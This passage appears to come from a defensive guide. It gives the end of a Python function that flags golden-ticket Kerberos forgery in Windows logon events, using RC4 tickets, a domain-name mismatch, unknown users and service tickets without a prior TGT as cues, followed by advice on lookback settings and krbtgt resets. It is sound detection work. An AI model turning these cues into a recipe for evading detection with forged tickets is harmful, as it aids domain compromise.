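        user = ev["TargetUserName"].split("@")[0].lower()
        if user.endswith("$"):
            continue
        key = (user, ev["IpAddress"])
        if ev["EventID"] == 4768:
            last_tgt[key] = ev["time"]
            continue
        if ev["EventID"] != 4769:
            continue
        reasons = []
        if ev.get("TicketEncryptionType") == RC4_HMAC:
            reasons.append("RC4 (0x17) service ticket in an AES-capable domain")
        if ev["TargetDomainName"].upper() != netbios_domain.upper():
            reasons.append("account domain is not the NetBIOS name (%r)" % ev["TargetDomainName"])
        if user not in known_users:
            reasons.append("user does not exist in the directory")
        t0 = last_tgt.get(key)
        if t0 is None or ev["time"] - t0 > tgt_lookback:
            reasons.append("no TGT (4768) issued to this user from this client within lookback")
        if reasons:
            alerts.append((ev, reasons))
    return alerts


if __name__ == "__main__":
    for ev, reasons in detect_golden_ticket(SAMPLE_EVENTS, KNOWN_USERS, "GOD"):
        print(f"{ev['time']} {ev['TargetUserName']} from {ev['IpAddress']}: {'; '.join(reasons)}")
```

The lookback has to cover the domain's TGT lifetime (10 hours by default, hence the default here), or legitimately renewed TGTs will be flagged, and the events must come from every DC since a client may obtain its TGT from one DC and request service tickets from another. Detection is the second line: the step that actually invalidates every forged ticket is resetting the krbtgt password twice, with enough time between the two resets for replication to complete.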